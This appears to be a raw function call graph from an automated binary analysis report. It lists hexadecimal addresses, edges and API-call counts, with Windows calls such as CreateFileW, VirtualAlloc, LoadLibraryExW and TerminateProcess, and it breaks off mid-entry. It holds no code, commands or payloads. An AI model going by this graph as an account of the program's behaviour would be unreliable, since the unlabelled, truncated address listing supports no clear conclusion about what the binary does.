8d859a 68 API calls 99221->99261 99262 8dd0dc 341 API calls 99221->99262 99263 8d9f3a 59 API calls Mailbox 99221->99263 99264 8dd060 89 API calls 99221->99264 99265 8dcedd 341 API calls 99221->99265 99269 8d8bb2 68 API calls 99221->99269 99270 8d9e9c 60 API calls Mailbox 99221->99270 99271 926d03 60 API calls 99221->99271 99272 8d81a7 99221->99272 99232 8da01f 99231->99232 99247 8da04d Mailbox 99231->99247 99233 8f0ff6 Mailbox 59 API calls 99232->99233 99233->99247 99234 8db5d5 99235 8d81a7 59 API calls 99234->99235 99249 8da1b7 99235->99249 99238 8f2f80 67 API calls __cinit 99238->99247 99239 8f0ff6 59 API calls Mailbox 99239->99247 99241 91047f 99280 93a0b5 89 API calls 4 library calls 99241->99280 99244 8d81a7 59 API calls 99244->99247 99245 8d77c7 59 API calls 99245->99247 99246 91048e 99246->99221 99247->99234 99247->99238 99247->99239 99247->99241 99247->99244 99247->99245 99248 927405 59 API calls 99247->99248 99247->99249 99250 910e00 99247->99250 99252 8db5da 99247->99252 99253 8da6ba 99247->99253 99278 8dca20 341 API calls 2 library calls 99247->99278 99279 8dba60 60 API calls Mailbox 99247->99279 99248->99247 99249->99221 99282 93a0b5 89 API calls 4 library calls 99250->99282 99283 93a0b5 89 API calls 4 library calls 99252->99283 99281 93a0b5 89 API calls 4 library calls 99253->99281 99254->99221 99255->99221 99257 8d862b 99256->99257 99259 8d8652 99257->99259 99284 8d8b13 69 API calls Mailbox 99257->99284 99259->99221 99260->99217 99261->99221 99262->99221 99263->99221 99264->99221 99265->99221 99266->99209 99267->99214 99268->99221 99269->99221 99270->99221 99271->99221 99273 8d81ba 99272->99273 99274 8d81b2 99272->99274 99273->99221 99285 8d80d7 99274->99285 99276->99214 99277->99208 99278->99247 99279->99247 99280->99246 99281->99249 99282->99252 99283->99249 99284->99259 99286 8d80e7 99285->99286 99288 8d80fa _memmove 99285->99288 99287 8f0ff6 Mailbox 59 API calls 99286->99287 99286->99288 99287->99288 99288->99273 99289 90ff06 99290 90ff10 99289->99290 99326 8dac90 Mailbox _memmove 99289->99326 99530 8d8e34 59 API calls Mailbox 99290->99530 99291 8f0ff6 59 API calls Mailbox 99291->99326 99297 8db5d5 99301 8d81a7 59 API calls 99297->99301 99298 8f0ff6 59 API calls Mailbox 99317 8da097 Mailbox 99298->99317 99310 8da1b7 99301->99310 99302 91047f 99534 93a0b5 89 API calls 4 library calls 99302->99534 99303 8db5da 99540 93a0b5 89 API calls 4 library calls 99303->99540 99305 8d81a7 59 API calls 99305->99317 99306 8d7f41 59 API calls 99306->99326 99308 91048e 99309 8d77c7 59 API calls 99309->99317 99311 927405 59 API calls 99311->99317 99313 9266f4 Mailbox 59 API calls 99313->99310 99314 910e00 99539 93a0b5 89 API calls 4 library calls 99314->99539 99316 8f2f80 67 API calls __cinit 99316->99317 99317->99297 99317->99298 99317->99302 99317->99303 99317->99305 99317->99309 99317->99310 99317->99311 99317->99314 99317->99316 99319 8da6ba 99317->99319 99524 8dca20 341 API calls 2 library calls 99317->99524 99525 8dba60 60 API calls Mailbox 99317->99525 99538 93a0b5 89 API calls 4 library calls 99319->99538 99321 8db416 99529 8df803 341 API calls 99321->99529 99322 8da000 341 API calls 99322->99326 99324 910c94 99536 8d9df0 59 API calls Mailbox 99324->99536 99326->99291 99326->99306 99326->99310 99326->99317 99326->99321 99326->99322 99326->99324 99327 910ca2 99326->99327 99330 8db37c 99326->99330 99335 8db685 99326->99335 99338 8dade2 Mailbox 99326->99338 99443 94c5f4 99326->99443 99475 937be0 99326->99475 99481 94bf80 99326->99481 99521 9266f4 99326->99521 99531 927405 59 API calls 99326->99531 99532 94c4a7 85 API calls 2 library calls 99326->99532 99537 93a0b5 89 API calls 4 library calls 99327->99537 99329 910c86 99329->99310 99329->99313 99527 8d9e9c 60 API calls Mailbox 99330->99527 99332 8db38d 99528 8d9e9c 60 API calls Mailbox 99332->99528 99535 93a0b5 89 API calls 4 library calls 99335->99535 99338->99310 99338->99329 99338->99335 99339 9100e0 VariantClear 99338->99339 99344 94e237 99338->99344 99347 8e2123 99338->99347 99387 94474d 99338->99387 99396 93d2e6 99338->99396 99526 8d9df0 59 API calls Mailbox 99338->99526 99533 927405 59 API calls 99338->99533 99339->99338 99541 94cdf1 99344->99541 99346 94e247 99346->99338 99686 8d9bf8 99347->99686 99351 8f0ff6 Mailbox 59 API calls 99352 8e2154 99351->99352 99355 8e2164 99352->99355 99725 8d5906 60 API calls Mailbox 99352->99725 99353 8e2189 99363 8e2196 99353->99363 99746 8d9c9c 59 API calls 99353->99746 99354 9169af 99354->99353 99745 93f7df 59 API calls 99354->99745 99357 8d9997 84 API calls 99355->99357 99359 8e2172 99357->99359 99726 8d5956 99359->99726 99361 9169f7 99361->99363 99364 9169ff 99361->99364 99699 8d5e3f 99363->99699 99747 8d9c9c 59 API calls 99364->99747 99368 8e219d 99369 916a11 99368->99369 99370 8e21b7 99368->99370 99372 8f0ff6 Mailbox 59 API calls 99369->99372 99371 8d77c7 59 API calls 99370->99371 99374 8e21bf 99371->99374 99373 916a17 99372->99373 99375 916a2b 99373->99375 99748 8d59b0 ReadFile SetFilePointerEx 99373->99748 99704 8d56d2 99374->99704 99380 916a2f _memmove 99375->99380 99749 93794e 59 API calls 2 library calls 99375->99749 99379 8e21ce 99379->99380 99719 8d9b9c 99379->99719 99382 8e221c 99382->99338 99383 8e21e2 Mailbox 99383->99382 99739 8d5dcf 99383->99739 99388 8d9997 84 API calls 99387->99388 99389 944787 99388->99389 99817 8d63a0 99389->99817 99391 944797 99392 9447bc 99391->99392 99393 8da000 341 API calls 99391->99393 99394 8d9bf8 59 API calls 99392->99394 99395 9447c0 99392->99395 99393->99392 99394->99395 99395->99338 99397 93d310 99396->99397 99398 93d305 99396->99398 99401 8d77c7 59 API calls 99397->99401 99441 93d3ea Mailbox 99397->99441 99855 8d9c9c 59 API calls 99398->99855 99400 8f0ff6 Mailbox 59 API calls 99402 93d433 99400->99402 99403 93d334 99401->99403 99404 93d43f 99402->99404 99921 8d5906 60 API calls Mailbox 99402->99921 99405 8d77c7 59 API calls 99403->99405 99407 8d9997 84 API calls 99404->99407 99408 93d33d 99405->99408 99409 93d457 99407->99409 99410 8d9997 84 API calls 99408->99410 99411 8d5956 67 API calls 99409->99411 99412 93d349 99410->99412 99413 93d466 99411->99413 99856 8d46f9 99412->99856 99415 93d46a GetLastError 99413->99415 99416 93d49e 99413->99416 99418 93d483 99415->99418 99420 93d500 99416->99420 99421 93d4c9 99416->99421 99417 93d35e 99907 8d7c8e 99417->99907 99440 93d3f3 Mailbox 99418->99440 99922 8d5a1a CloseHandle 99418->99922 99425 8f0ff6 Mailbox 59 API calls 99420->99425 99422 8f0ff6 Mailbox 59 API calls 99421->99422 99426 93d4ce 99422->99426 99423 93d3e3 99920 8d9c9c 59 API calls 99423->99920 99430 93d505 99425->99430 99431 93d4df 99426->99431 99434 8d77c7 59 API calls 99426->99434 99433 8d77c7 59 API calls 99430->99433 99430->99440 99923 93f835 59 API calls 2 library calls 99431->99923 99433->99440 99434->99431 99435 93d3a5 99437 8d7f41 59 API calls 99435->99437 99438 93d3b2 99437->99438 99919 933c66 63 API calls Mailbox 99438->99919 99440->99338 99441->99400 99441->99440 99442 93d3bb Mailbox 99442->99423 99444 8d77c7 59 API calls 99443->99444 99445 94c608 99444->99445 99446 8d77c7 59 API calls 99445->99446 99447 94c610 99446->99447 99448 8d77c7 59 API calls 99447->99448 99449 94c618 99448->99449 99450 8d9997 84 API calls 99449->99450 99473 94c626 99450->99473 99451 8d7d2c 59 API calls 99451->99473 99452 94c80f 99453 94c83c Mailbox 99452->99453 99455 8d9b9c 59 API calls 99452->99455 99453->99326 99454 94c7f6 99459 8d7e0b 59 API calls 99454->99459 99455->99453 99456 8d7a84 59 API calls 99456->99473 99457 94c811 99460 8d7e0b 59 API calls 99457->99460 99458 8d81a7 59 API calls 99458->99473 99461 94c803 99459->99461 99462 94c820 99460->99462 99464 8d7c8e 59 API calls 99461->99464 99465 8d7c8e 59 API calls 99462->99465 99463 8d7faf 59 API calls 99467 94c6bd CharUpperBuffW 99463->99467 99464->99452 99465->99452 99466 8d7faf 59 API calls 99468 94c77d CharUpperBuffW 99466->99468 99939 8d859a 68 API calls 99467->99939 99940 8dc707 69 API calls 2 library calls 99468->99940 99471 8d9997 84 API calls 99471->99473 99472 8d7c8e 59 API calls 99472->99473 99473->99451 99473->99452 99473->99453 99473->99454 99473->99456 99473->99457 99473->99458 99473->99463 99473->99466 99473->99471 99473->99472 99474 8d7e0b 59 API calls 99473->99474 99474->99473 99476 937bec 99475->99476 99477 8f0ff6 Mailbox 59 API calls 99476->99477 99478 937bfa 99477->99478 99479 937c08 99478->99479 99480 8d77c7 59 API calls 99478->99480 99479->99326 99480->99479 99482 94bfc5 99481->99482 99483 94bfab 99481->99483 99942 94a528 59 API calls Mailbox 99482->99942 99941 93a0b5 89 API calls 4 library calls 99483->99941 99486 94bfd0 99487 8da000 340 API calls 99486->99487 99488 94c031 99487->99488 99489 94c0c3 99488->99489 99493 94c072 99488->99493 99504 94bfbd Mailbox 99488->99504 99490 94c119 99489->99490 99491 94c0c9 99489->99491 99492 8d9997 84 API calls 99490->99492 99490->99504 99962 937ba4 59 API calls 99491->99962 99494 94c12b 99492->99494 99943 937581 59 API calls Mailbox 99493->99943 99496 8d7faf 59 API calls 99494->99496 99499 94c14f CharUpperBuffW 99496->99499 99497 94c0ec 99963 8d5ea1 59 API calls Mailbox 99497->99963 99505 94c169 99499->99505 99501 94c0a2 99944 8df5c0 99501->99944 99503 94c0f4 Mailbox 99964 8dfe40 341 API calls 2 library calls 99503->99964 99504->99326 99506 94c170 99505->99506 99507 94c1bc 99505->99507 99965 937581 59 API calls Mailbox 99506->99965 99508 8d9997 84 API calls 99507->99508 99510 94c1c4 99508->99510 99966 8d9fbd 60 API calls 99510->99966 99513 94c19e 99514 8df5c0 340 API calls 99513->99514 99514->99504 99515 94c1ce 99515->99504 99516 8d9997 84 API calls 99515->99516 99517 94c1e9 99516->99517 99967 8d5ea1 59 API calls Mailbox 99517->99967 99519 94c1f9 99968 8dfe40 341 API calls 2 library calls 99519->99968 101033 926636 99521->101033 99523 926702 99523->99326 99524->99317 99525->99317 99526->99338 99527->99332 99528->99321 99529->99335 99530->99326 99531->99326 99532->99326 99533->99338 99534->99308 99535->99329 99536->99329 99537->99329 99538->99310 99539->99303 99540->99310 99579 8d9997 99541->99579 99545 94d0cd 99546 94d242 99545->99546 99550 94d0db 99545->99550 99647 94dbdc 92 API calls Mailbox 99546->99647 99549 94d251 99549->99550 99551 94d25d 99549->99551 99610 94cc82 99550->99610 99567 94ce75 Mailbox 99551->99567 99552 8d9997 84 API calls 99569 94cec6 Mailbox 99552->99569 99557 94d114 99625 8f0e48 99557->99625 99560 94d147 99632 8d942e 99560->99632 99561 94d12e 99631 93a0b5 89 API calls 4 library calls 99561->99631 99565 94d139 GetCurrentProcess TerminateProcess 99565->99560 99567->99346 99569->99545 99569->99552 99569->99567 99629 93f835 59 API calls 2 library calls 99569->99629 99630 94d2f3 61 API calls 2 library calls 99569->99630 99571 94d2b8 99571->99567 99575 94d2cc FreeLibrary 99571->99575 99572 94d17f 99644 94d95d 107 API calls _free 99572->99644 99575->99567 99578 94d190 99578->99571 99645 8d8ea0 59 API calls Mailbox 99578->99645 99646 8d9e9c 60 API calls Mailbox 99578->99646 99648 94d95d 107 API calls _free 99578->99648 99580 8d99b1 99579->99580 99589 8d99ab 99579->99589 99581 90f9fc __i64tow 99580->99581 99582 8d99f9 99580->99582 99583 8d99b7 __itow 99580->99583 99588 90f903 99580->99588 99649 8f38d8 83 API calls 3 library calls 99582->99649 99586 8f0ff6 Mailbox 59 API calls 99583->99586 99587 8d99d1 99586->99587 99587->99589 99591 8d7f41 59 API calls 99587->99591 99590 8f0ff6 Mailbox 59 API calls 99588->99590 99595 90f97b Mailbox _wcscpy 99588->99595 99589->99567 99597 94dab9 99589->99597 99592 90f948 99590->99592 99591->99589 99593 8f0ff6 Mailbox 59 API calls 99592->99593 99594 90f96e 99593->99594 99594->99595 99596 8d7f41 59 API calls 99594->99596 99650 8f38d8 83 API calls 3 library calls 99595->99650 99596->99595 99598 8d7faf 59 API calls 99597->99598 99599 94dad4 CharLowerBuffW 99598->99599 99651 92f658 99599->99651 99603 8d77c7 59 API calls 99604 94db0d 99603->99604 99658 8d79ab 99604->99658 99606 94db24 99607 8d7e8c 59 API calls 99606->99607 99608 94db30 Mailbox 99607->99608 99609 94db6c Mailbox 99608->99609 99671 94d2f3 61 API calls 2 library calls 99608->99671 99609->99569 99611 94cc9d 99610->99611 99612 94ccf2 99610->99612 99613 8f0ff6 Mailbox 59 API calls 99611->99613 99616 94dd64 99612->99616 99615 94ccbf 99613->99615 99614 8f0ff6 Mailbox 59 API calls 99614->99615 99615->99612 99615->99614 99617 94df8d Mailbox 99616->99617 99624 94dd87 _strcat _wcscpy __NMSG_WRITE 99616->99624 99617->99557 99618 8d9d46 59 API calls 99618->99624 99619 8d9c9c 59 API calls 99619->99624 99620 8d9cf8 59 API calls 99620->99624 99621 8d9997 84 API calls 99621->99624 99622 8f594c 58 API calls __crtCompareStringA_stat 99622->99624 99624->99617 99624->99618 99624->99619 99624->99620 99624->99621 99624->99622 99675 935b29 61 API calls 2 library calls 99624->99675 99626 8f0e5d 99625->99626 99627 8f0ef5 VirtualAlloc 99626->99627 99628 8f0ec3 99626->99628 99627->99628 99628->99560 99628->99561 99629->99569 99630->99569 99631->99565 99633 8d9436 99632->99633 99634 8f0ff6 Mailbox 59 API calls 99633->99634 99635 8d9444 99634->99635 99636 8d9450 99635->99636 99676 8d935c 59 API calls Mailbox 99635->99676 99638 8d91b0 99636->99638 99677 8d92c0 99638->99677 99640 8d91bf 99641 8f0ff6 Mailbox 59 API calls 99640->99641 99642 8d925b 99640->99642 99641->99642 99642->99578 99643 8d8ea0 59 API calls Mailbox 99642->99643 99643->99572 99644->99578 99645->99578 99646->99578 99647->99549 99648->99578 99649->99583 99650->99581 99653 92f683 __NMSG_WRITE 99651->99653 99652 92f6c2 99652->99603 99652->99608 99653->99652 99654 92f6b8 99653->99654 99655 92f769 99653->99655 99654->99652 99672 8d7a24 61 API calls 99654->99672 99655->99652 99673 8d7a24 61 API calls 99655->99673 99659 8d79ba 99658->99659 99660 8d7a17 99658->99660 99659->99660 99662 8d79c5 99659->99662 99661 8d7e8c 59 API calls 99660->99661 99663 8d79e8 _memmove 99661->99663 99664 90ef32 99662->99664 99665 8d79e0 99662->99665 99663->99606 99666 8d8189 59 API calls 99664->99666 99674 8d8087 59 API calls Mailbox 99665->99674 99668 90ef3c 99666->99668 99669 8f0ff6 Mailbox 59 API calls 99668->99669 99670 90ef5c 99669->99670 99671->99609 99672->99654 99673->99655 99674->99663 99675->99624 99676->99636 99678 8d92c9 Mailbox 99677->99678 99679 90f5c8 99678->99679 99684 8d92d3 99678->99684 99680 8f0ff6 Mailbox 59 API calls 99679->99680 99682 90f5d4 99680->99682 99681 8d92da 99681->99640 99684->99681 99685 8d9df0 59 API calls Mailbox 99684->99685 99685->99684 99687 8d9c08 99686->99687 99688 90fbff 99686->99688 99693 8f0ff6 Mailbox 59 API calls 99687->99693 99689 90fc10 99688->99689 99691 8d7d2c 59 API calls 99688->99691 99690 8d7eec 59 API calls 99689->99690 99692 90fc1a 99690->99692 99691->99689 99696 8d77c7 59 API calls 99692->99696 99698 8d9c34 99692->99698 99694 8d9c1b 99693->99694 99694->99692 99695 8d9c26 99694->99695 99697 8d7f41 59 API calls 99695->99697 99695->99698 99696->99698 99697->99698 99698->99351 99698->99354 99750 8d5c4e 99699->99750 99702 8d5c4e 2 API calls 99703 8d5e74 99702->99703 99703->99368 99705 8d56dd 99704->99705 99706 8d5702 99704->99706 99705->99706 99711 8d56ec 99705->99711 99707 8d7eec 59 API calls 99706->99707 99710 93349a 99707->99710 99708 9334c9 99708->99379 99710->99708 99760 933436 ReadFile SetFilePointerEx 99710->99760 99761 8d7a84 59 API calls 2 library calls 99710->99761 99762 8d5c18 99711->99762 99717 9335d8 Mailbox 99717->99379 99720 8d9be7 99719->99720 99722 8d9ba8 99719->99722 99721 8d81a7 59 API calls 99720->99721 99724 8d9bbb 99721->99724 99723 8f0ff6 Mailbox 59 API calls 99722->99723 99723->99724 99724->99383 99725->99355 99727 8d5dcf CloseHandle 99726->99727 99728 8d5962 99727->99728 99790 8d5df9 99728->99790 99730 8d59a4 99730->99353 99730->99354 99744 8d5a1a CloseHandle 99730->99744 99731 8d5981 99731->99730 99798 8d5770 99731->99798 99733 8d5993 99815 8d53db SetFilePointerEx SetFilePointerEx 99733->99815 99735 8d599a 99735->99730 99736 90e030 99735->99736 99816 933696 SetFilePointerEx SetFilePointerEx WriteFile 99736->99816 99738 90e060 99738->99730 99740 8d5dd9 99739->99740 99741 8d5de8 99739->99741 99740->99382 99743 8d5a1a CloseHandle 99740->99743 99741->99740 99742 8d5ded CloseHandle 99741->99742 99742->99740 99743->99382 99744->99354 99745->99354 99746->99361 99747->99368 99748->99375 99749->99380 99757 8d5c68 99750->99757 99751 8d5cef SetFilePointerEx 99758 8d5dae SetFilePointerEx 99751->99758 99752 90e151 99759 8d5dae SetFilePointerEx 99752->99759 99755 8d5cc3 99755->99702 99756 90e16b 99757->99751 99757->99752 99757->99755 99758->99755 99759->99756 99760->99710 99761->99710 99763 8f0ff6 Mailbox 59 API calls 99762->99763 99764 8d5c2b 99763->99764 99765 8f0ff6 Mailbox 59 API calls 99764->99765 99766 8d5c37 99765->99766 99767 8d5632 99766->99767 99774 8d5a2f 99767->99774 99769 8d5643 99771 8d5674 99769->99771 99781 8d5d20 99769->99781 99787 8d5bda 59 API calls 2 library calls 99769->99787 99771->99717 99773 8d793a 61 API calls Mailbox 99771->99773 99773->99717 99775 90e065 99774->99775 99776 8d5a40 99774->99776 99788 926443 59 API calls Mailbox 99775->99788 99776->99769 99778 90e06f 99779 8f0ff6 Mailbox 59 API calls 99778->99779 99780 90e07b 99779->99780 99782 8d5d93 99781->99782 99783 8d5d2e 99781->99783 99789 8d5dae SetFilePointerEx 99782->99789 99784 8d5d56 99783->99784 99786 8d5d66 ReadFile 99783->99786 99784->99769 99786->99783 99786->99784 99787->99769 99788->99778 99789->99783 99791 90e181 99790->99791 99792 8d5e12 CreateFileW 99790->99792 99793 8d5e34 99791->99793 99794 90e187 CreateFileW 99791->99794 99792->99793 99793->99731 99794->99793 99795 90e1ad 99794->99795 99796 8d5c4e 2 API calls 99795->99796 99797 90e1b8 99796->99797 99797->99793 99799 8d578b 99798->99799 99800 90dfce 99798->99800 99801 8d5c4e 2 API calls 99799->99801 99814 8d581a 99799->99814 99804 8d5e3f 2 API calls 99800->99804 99800->99814 99802 8d57ad 99801->99802 99803 8d538e 59 API calls 99802->99803 99805 8d57b7 99803->99805 99804->99814 99805->99800 99806 8d57c4 99805->99806 99807 8f0ff6 Mailbox 59 API calls 99806->99807 99808 8d57cf 99807->99808 99809 8d538e 59 API calls 99808->99809 99810 8d57da 99809->99810 99811 8d5d20 2 API calls 99810->99811 99812 8d5807 99811->99812 99813 8d5c4e 2 API calls 99812->99813 99813->99814 99814->99733 99815->99735 99816->99738 99842 8d7b76 99817->99842 99819 8d65ca 99849 8d766f 59 API calls 2 library calls 99819->99849 99821 8d65e4 Mailbox 99821->99391 99824 8d766f 59 API calls 99838 8d63c5 99824->99838 99825 90e41f 99852 92fdba 91 API calls 4 library calls 99825->99852 99829 8d7eec 59 API calls 99829->99838 99830 90e42d 99853 8d766f 59 API calls 2 library calls 99830->99853 99832 90e443 99832->99821 99833 8d68f9 _memmove 99854 92fdba 91 API calls 4 library calls 99833->99854 99834 90e3bb 99835 8d8189 59 API calls 99834->99835 99837 90e3c6 99835->99837 99841 8f0ff6 Mailbox 59 API calls 99837->99841 99838->99819 99838->99824 99838->99825 99838->99829 99838->99833 99838->99834 99839 8d7faf 59 API calls 99838->99839 99847 8d60cc 60 API calls 99838->99847 99848 8d5ea1 59 API calls Mailbox 99838->99848 99850 8d5fd2 60 API calls 99838->99850 99851 8d7a84 59 API calls 2 library calls 99838->99851 99840 8d659b CharUpperBuffW 99839->99840 99840->99838 99841->99833 99843 8f0ff6 Mailbox 59 API calls 99842->99843 99844 8d7b9b 99843->99844 99845 8d8189 59 API calls 99844->99845 99846 8d7baa 99845->99846 99846->99838 99847->99838 99848->99838 99849->99821 99850->99838 99851->99838 99852->99830 99853->99832 99854->99821 99855->99397 99857 8d77c7 59 API calls 99856->99857 99858 8d470f 99857->99858 99859 8d77c7 59 API calls 99858->99859 99860 8d4717 99859->99860 99861 8d77c7 59 API calls 99860->99861 99862 8d471f 99861->99862 99863 8d77c7 59 API calls 99862->99863 99864 8d4727 99863->99864 99865 8d475b 99864->99865 99866 90d8fb 99864->99866 99867 8d79ab 59 API calls 99865->99867 99868 8d81a7 59 API calls 99866->99868 99869 8d4769 99867->99869 99870 90d904 99868->99870 99871 8d7e8c 59 API calls 99869->99871 99872 8d7eec 59 API calls 99870->99872 99873 8d4773 99871->99873 99875 8d479e 99872->99875 99874 8d79ab 59 API calls 99873->99874 99873->99875 99878 8d4794 99874->99878 99876 8d47de 99875->99876 99879 8d47bd 99875->99879 99889 90d924 99875->99889 99877 8d79ab 59 API calls 99876->99877 99880 8d47ef 99877->99880 99881 8d7e8c 59 API calls 99878->99881 99924 8d7b52 99879->99924 99884 8d4801 99880->99884 99887 8d81a7 59 API calls 99880->99887 99881->99875 99882 90d9f4 99885 8d7d2c 59 API calls 99882->99885 99888 8d4811 99884->99888 99890 8d81a7 59 API calls 99884->99890 99906 90d9b1 99885->99906 99887->99884 99892 8d4818 99888->99892 99894 8d81a7 59 API calls 99888->99894 99889->99882 99891 90d9dd 99889->99891 99901 90d95b 99889->99901 99890->99888 99891->99882 99896 90d9c8 99891->99896 99895 8d81a7 59 API calls 99892->99895 99903 8d481f Mailbox 99892->99903 99893 8d79ab 59 API calls 99893->99876 99894->99892 99895->99903 99899 8d7d2c 59 API calls 99896->99899 99897 90d9b9 99898 8d7d2c 59 API calls 99897->99898 99898->99906 99899->99906 99900 8d7b52 59 API calls 99900->99906 99901->99897 99904 90d9a4 99901->99904 99903->99417 99905 8d7d2c 59 API calls 99904->99905 99905->99906 99906->99876 99906->99900 99927 8d7a84 59 API calls 2 library calls 99906->99927 99908 90f094 99907->99908 99909 8d7ca0 99907->99909 99934 928123 59 API calls _memmove 99908->99934 99928 8d7bb1 99909->99928 99912 8d7cac 99912->99423 99916 933e73 99912->99916 99913 90f09e 99914 8d81a7 59 API calls 99913->99914 99915 90f0a6 Mailbox 99914->99915 99935 934696 GetFileAttributesW 99916->99935 99919->99442 99920->99441 99921->99404 99922->99440 99923->99440 99925 8d7faf 59 API calls 99924->99925 99926 8d47c7 99925->99926 99926->99876 99926->99893 99927->99906 99929 8d7be5 _memmove 99928->99929 99930 8d7bbf 99928->99930 99929->99912 99929->99929 99930->99929 99931 8f0ff6 Mailbox 59 API calls 99930->99931 99932 8d7c34 99931->99932 99933 8f0ff6 Mailbox 59 API calls 99932->99933 99933->99929 99934->99913 99936 933e7a 99935->99936 99937 9346b1 FindFirstFileW 99935->99937 99936->99423 99936->99435 99937->99936 99938 9346c6 FindClose 99937->99938 99938->99936 99939->99473 99940->99473 99941->99504 99942->99486 99943->99501 99945 8df61a 99944->99945 99946 8df7b0 99944->99946 99948 914848 99945->99948 99949 8df626 99945->99949 99947 8d7f41 59 API calls 99946->99947 99955 8df6ec Mailbox 99947->99955 99950 94bf80 341 API calls 99948->99950 100052 8df3f0 341 API calls 2 library calls 99949->100052 99952 914856 99950->99952 99956 8df790 99952->99956 100054 93a0b5 89 API calls 4 library calls 99952->100054 99954 8df65d 99954->99952 99954->99955 99954->99956 99958 8df743 99955->99958 99959 933e73 3 API calls 99955->99959 99969 94e24b 99955->99969 99972 93cde5 99955->99972 99956->99504 99958->99956 100053 8d9df0 59 API calls Mailbox 99958->100053 99959->99958 99962->99497 99963->99503 99964->99504 99965->99513 99966->99515 99967->99519 99968->99504 99970 94cdf1 130 API calls 99969->99970 99971 94e25b 99970->99971 99971->99958 99973 8d77c7 59 API calls 99972->99973 99974 93ce1a 99973->99974 99975 8d77c7 59 API calls 99974->99975 99976 93ce23 99975->99976 99977 93ce37 99976->99977 100188 8d9c9c 59 API calls 99976->100188 99979 8d9997 84 API calls 99977->99979 99980 93ce54 99979->99980 99981 93ce76 99980->99981 99982 93cf55 99980->99982 99986 93cf85 Mailbox 99980->99986 99984 8d9997 84 API calls 99981->99984 100055 8d4f3d 99982->100055 99987 93ce82 99984->99987 99986->99958 99988 8d81a7 59 API calls 99987->99988 99990 93ce8e 99988->99990 99989 93cf81 99989->99986 99992 8d77c7 59 API calls 99989->99992 99995 93cea2 99990->99995 99996 93ced4 99990->99996 99991 8d4f3d 136 API calls 99991->99989 99993 93cfb6 99992->99993 99994 8d77c7 59 API calls 99993->99994 99997 93cfbf 99994->99997 99998 8d81a7 59 API calls 99995->99998 99999 8d9997 84 API calls 99996->99999 100000 8d77c7 59 API calls 99997->100000 100002 93ceb2 99998->100002 100003 93cee1 99999->100003 100001 93cfc8 100000->100001 100004 8d77c7 59 API calls 100001->100004 100005 8d7e0b 59 API calls 100002->100005 100006 8d81a7 59 API calls 100003->100006 100008 93cfd1 100004->100008 100009 93cebc 100005->100009 100007 93ceed 100006->100007 100189 934cd3 GetFileAttributesW 100007->100189 100011 8d9997 84 API calls 100008->100011 100012 8d9997 84 API calls 100009->100012 100014 93cfde 100011->100014 100015 93cec8 100012->100015 100013 93cef6 100016 93cf09 100013->100016 100019 8d7b52 59 API calls 100013->100019 100017 8d46f9 59 API calls 100014->100017 100018 8d7c8e 59 API calls 100015->100018 100021 8d9997 84 API calls 100016->100021 100027 93cf0f 100016->100027 100020 93cff9 100017->100020 100018->99996 100019->100016 100022 8d7b52 59 API calls 100020->100022 100023 93cf36 100021->100023 100024 93d008 100022->100024 100190 933a2b 75 API calls Mailbox 100023->100190 100026 93d03c 100024->100026 100029 8d7b52 59 API calls 100024->100029 100028 8d81a7 59 API calls 100026->100028 100027->99986 100030 93d04a 100028->100030 100031 93d019 100029->100031 100032 8d7c8e 59 API calls 100030->100032 100031->100026 100034 8d7d2c 59 API calls 100031->100034 100033 93d058 100032->100033 100035 8d7c8e 59 API calls 100033->100035 100036 93d02e 100034->100036 100037 93d066 100035->100037 100038 8d7d2c 59 API calls 100036->100038 100039 8d7c8e 59 API calls 100037->100039 100038->100026 100040 93d074 100039->100040 100041 8d9997 84 API calls 100040->100041 100042 93d080 100041->100042 100079 9342ad 100042->100079 100044 93d091 100045 933e73 3 API calls 100044->100045 100046 93d09b 100045->100046 100047 8d9997 84 API calls 100046->100047 100051 93d0cc 100046->100051 100048 93d0b9 100047->100048 100133 9393df 100048->100133 100191 8d4faa 100051->100191 100052->99954 100053->99958 100054->99956 100197 8d4d13 100055->100197 100060 8d4f68 LoadLibraryExW 100207 8d4cc8 100060->100207 100061 90dd0f 100062 8d4faa 84 API calls 100061->100062 100064 90dd16 100062->100064 100066 8d4cc8 3 API calls 100064->100066 100068 90dd1e 100066->100068 100233 8d506b 100068->100233 100069 8d4f8f 100069->100068 100070 8d4f9b 100069->100070 100072 8d4faa 84 API calls 100070->100072 100074 8d4fa0 100072->100074 100074->99989 100074->99991 100076 90dd45 100241 8d5027 100076->100241 100080 9342c9 100079->100080 100081 9342ce 100080->100081 100082 9342dc 100080->100082 100083 8d81a7 59 API calls 100081->100083 100084 8d77c7 59 API calls 100082->100084 100132 9342d7 Mailbox 100083->100132 100085 9342e4 100084->100085 100086 8d77c7 59 API calls 100085->100086 100087 9342ec 100086->100087 100088 8d77c7 59 API calls 100087->100088 100089 9342f7 100088->100089 100090 8d77c7 59 API calls 100089->100090 100091 9342ff 100090->100091 100092 8d77c7 59 API calls 100091->100092 100093 934307 100092->100093 100094 8d77c7 59 API calls 100093->100094 100095 93430f 100094->100095 100096 8d77c7 59 API calls 100095->100096 100097 934317 100096->100097 100098 8d77c7 59 API calls 100097->100098 100099 93431f 100098->100099 100100 8d46f9 59 API calls 100099->100100 100101 934336 100100->100101 100102 8d46f9 59 API calls 100101->100102 100103 93434f 100102->100103 100104 8d7b52 59 API calls 100103->100104 100105 93435b 100104->100105 100106 93436e 100105->100106 100107 8d7e8c 59 API calls 100105->100107 100108 8d7b52 59 API calls 100106->100108 100107->100106 100109 934377 100108->100109 100110 934387 100109->100110 100111 8d7e8c 59 API calls 100109->100111 100112 8d81a7 59 API calls 100110->100112 100111->100110 100113 934393 100112->100113 100114 8d7c8e 59 API calls 100113->100114 100115 93439f 100114->100115 100668 93445f 59 API calls 100115->100668 100117 9343ae 100669 93445f 59 API calls 100117->100669 100119 9343c1 100120 8d7b52 59 API calls 100119->100120 100121 9343cb 100120->100121 100122 9343e2 100121->100122 100123 9343d0 100121->100123 100125 8d7b52 59 API calls 100122->100125 100124 8d7e0b 59 API calls 100123->100124 100131 9343dd 100124->100131 100126 9343eb 100125->100126 100127 934409 100126->100127 100129 8d7e0b 59 API calls 100126->100129 100128 8d7c8e 59 API calls 100127->100128 100128->100132 100129->100131 100130 8d7c8e 59 API calls 100130->100127 100131->100130 100132->100044 100134 9393ec __write_nolock 100133->100134 100135 8f0ff6 Mailbox 59 API calls 100134->100135 100136 939449 100135->100136 100137 8d538e 59 API calls 100136->100137 100138 939453 100137->100138 100139 9391e9 GetSystemTimeAsFileTime 100138->100139 100140 93945e 100139->100140 100141 8d5045 85 API calls 100140->100141 100142 939471 _wcscmp 100141->100142 100143 939542 100142->100143 100144 939495 100142->100144 100145 9399be 96 API calls 100143->100145 100700 